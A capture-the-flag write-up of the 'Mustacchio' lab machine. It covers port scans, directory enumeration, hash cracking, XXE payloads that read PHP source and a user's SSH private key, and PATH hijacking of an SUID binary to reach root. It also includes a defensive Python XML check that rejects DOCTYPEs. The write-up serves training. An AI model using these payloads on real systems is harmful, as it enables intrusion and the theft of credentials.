Intro

This machine provides a great opportunity for beginners to practice and develop fundamental skills. It covers various aspects such as port scanning, web directory enumeration, exploiting vulnerabilities like XXE, privilege escalation, and more. By working on this machine, beginners can gain hands-on experience and build a solid foundation in penetration testing and cybersecurity.

0x00 Recon

First, let's scan with rustscan.

rustscan -a 10.10.219.48

.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.219.48:22
Open 10.10.219.48:80
Open 10.10.219.48:8765

Hmm, ports 22, 80 and 8765 are open.
Since 8765 is an unfamiliar port, we ran a second scan with nmap.

sudo nmap -Pn -sC -sV -A -O 10.10.219.48 -p 22,80,8765
PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 581b0c0ffacf05be4cc07af1f188611c (RSA)
| 256 3cfce8a37e039a302c77e00a1ce452e6 (ECDSA)
|_ 256 9d59c6c779c554c41daae4d184710192 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
|_http-server-header: nginx/1.10.3 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's take a look at ports 80 and 8765, both of which serve HTTP.

After further investigation, it turned out that port 80 hosts a static website, while port 8765 presents a login page.
So let's start gathering information to see if we can obtain a password for the login page.
Let's use dirsearch for directory scanning.

dirsearch -u http://10.10.170.57

After the directory scan, we noticed a directory named "custom" that looks suspicious.

Inside the "custom" directory, we discovered a file named "users.bak", which raises further suspicion.
So let's download it and inspect it with cat and strings.

It appears that the content of the "users.bak" file includes a hash.
When encountering a hash, I often use "crackstation.net" for cracking.

Nice. Next, let's log in and see what we can discover.

Great, we have successfully logged in.
Looking at this page, there seems to be potential for Remote Code Execution (RCE).
Let's first check whether this functionality lets us inject PHP code for RCE.
After submitting, let's examine the request.

The form sends XML as its input.

At this point, let's change our approach and try XXE (XML External Entity) injection.

0x01 XXE

It seems to be successful.

Let's explore around and then examine the source code of the current page.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/convert.base64-encode/resource=/var/www/nginx/home.php"> ]>
<root>
<name>&ent;</name>
</root>
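From the defender's side, the fix for the injection above is to refuse any document that carries a DOCTYPE before the parser gets a chance to expand it. The following Python check is an added example, not code from this write-up or from the machine's PHP application (which the page does not show); it parses the same <root><name> document the form submits and rejects the payload above, using only the standard library.

```python
import xml.parsers.expat


class UnsafeXmlError(ValueError):
    """Raised when a submission carries a DTD, the vehicle for XXE."""


def parse_without_dtd(xml_text):
    """Parse a flat <root><name>..</name></root> document into {tag: text}.
    A DOCTYPE aborts parsing before expat can act on it, so a SYSTEM entity
    (php://filter, a file path) is never resolved or echoed back."""
    parser = xml.parsers.expat.ParserCreate()
    fields, open_tags = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE declaration refused (root {name!r})")

    def on_start(tag, _attrs):
        open_tags.append(tag)
        fields.setdefault(tag, "")

    def on_text(data):
        if open_tags:
            fields[open_tags[-1]] += data

    # Entity declarations can only appear inside a DOCTYPE, so refusing the
    # DOCTYPE covers internal, external and parameter entities alike.
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = lambda _tag: open_tags.pop()
    parser.CharacterDataHandler = on_text
    parser.Parse(xml_text, True)
    return {tag: text.strip() for tag, text in fields.items()}


def check_submission(xml_text):
    """Return (True, fields) for a plain document, else (False, reason)."""
    try:
        return True, parse_without_dtd(xml_text)
    except UnsafeXmlError as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"


# Constructed samples: a normal submission and the write-up's XXE document.
BENIGN_SUBMISSION = '<?xml version="1.0" encoding="UTF-8"?><root><name>Barry</name></root>'
XXE_SUBMISSION = ('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE replace [<!ENTITY ent SYSTEM '
                  '"php://filter/convert.base64-encode/resource=/var/www/nginx/home.php"> ]>'
                  '<root><name>&ent;</name></root>')
```

Run check_submission on each sample: the benign document yields the name field, the XXE document is refused with a reason naming the DOCTYPE, and an unterminated document is reported as malformed rather than partially processed.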

We discover a comment stating that "barry" can use SSH.

Let's gamble and see if the current user's privileges allow us to read Barry's id_rsa.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/convert.base64-encode/resource=/home/barry/.ssh/id_rsa"> ]>
<root>
<name>&ent;</name>
</root>

Nice, we got it.

Let's use ssh2john to convert the SSH private key file (id_rsa) into a format that John the Ripper can crack.

Finally, we successfully logged in over SSH with Barry's credentials.

0x02 Privilege Escalation

We can get the user flag in Barry's home directory.

Let's first examine the available permissions and SUID binaries that we could make use of.
We observe that /home/joe/live_log is an SUID file we haven't explored yet,
so we try cat and strings on it.

cat /home/joe/live_log

In its output we can see that /home/joe/live_log invokes tar -f.

So we can create our own tar file and modify the environment variables so that live_log executes our tar instead.
Finally, let's execute it and read root.txt under the root directory.